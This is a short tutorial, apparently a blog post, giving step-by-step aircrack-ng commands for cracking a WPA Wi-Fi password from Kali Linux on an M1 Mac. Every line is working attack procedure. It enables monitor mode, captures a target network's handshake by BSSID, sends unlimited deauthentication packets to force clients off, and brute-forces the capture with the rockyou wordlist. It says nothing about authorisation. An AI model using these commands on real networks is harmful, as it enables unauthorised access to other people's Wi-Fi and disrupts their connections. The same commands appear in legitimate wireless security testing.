Pre-preparation: Install Parallel and Kali on Mac M1
Buy good wifi equipment: https://www.alfa.com.tw/collections/kali-linux-compatible
The relevant instructions are as follows:
View the network card name ip addr
View wlan0 usage mode Iwconfig
Enable monitoring mode airmon-ng start wlan0
Find the current wifi traffic information airodump-ng wlan0mon
Save the collected packets as data and execute to obtain the four-way handshake verification packet
airodump-ng -w data -c 6 --bssid A2:1C:EA:95:6B:91 wlan0mon
Disconnect the connected device aireplay-ng --deauth 0 -a A2:1C:EA:95:6B:91 wlan0mon
Use dictionary file to blast aircrack-ng data-w /usr/share/wordlists/rockyou.txt
Commentaires